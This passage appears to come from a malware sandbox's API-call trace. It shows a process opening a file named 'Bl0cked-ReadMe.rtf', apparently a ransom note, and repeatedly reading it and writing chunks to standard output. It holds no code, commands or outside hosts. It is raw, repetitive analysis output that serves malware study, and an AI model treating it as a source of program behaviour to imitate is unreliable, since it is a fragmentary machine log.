(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28dd58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.874] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.874] GetFileType (hFile=0x54) returned 0x1 [0140.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.875] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28ddb0 | out: lpFileSizeHigh=0x28ddb0*=0x0) returned 0x1632 [0140.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.875] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.875] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.875] GetFileType (hFile=0x4c) returned 0x1 [0140.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.875] GetFileType (hFile=0x4c) returned 0x1 [0140.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.875] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] GetFileType (hFile=0x4c) returned 0x1 [0140.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.876] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.877] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.877] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.877] GetFileType (hFile=0x4c) returned 0x1 [0140.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.878] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.878] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.878] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.879] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.879] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.880] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.881] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.881] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.882] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.882] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.883] ReadFile (in: hFile=0x54, 